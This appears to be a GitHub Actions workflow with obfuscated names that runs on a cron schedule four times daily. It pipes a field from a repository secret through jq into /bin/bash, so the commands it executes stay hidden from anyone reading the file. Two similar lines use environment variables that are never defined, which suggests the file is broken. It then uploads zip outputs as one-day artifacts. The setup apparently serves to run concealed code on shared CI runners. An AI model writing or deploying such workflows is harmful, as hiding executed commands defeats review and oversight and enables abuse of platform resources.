name: yongfenmanchang
on:
  workflow_dispatch:

  schedule:
    - cron: '26 4,10,16,22 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: yongfenmanchang
        env:
          czf304: ${{ secrets.czf304 }}
        run: |
          printf '%s' "$czf304" | jq -r .k8 | /bin/bash
          printf '%s' "$eld0150" | jq -r .ivk7 | /bin/bash
          printf '%s' "$axwu307" | jq -r .eowf77626 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: WZhFkRSK
          path: "*.zip"
          retention-days: 1
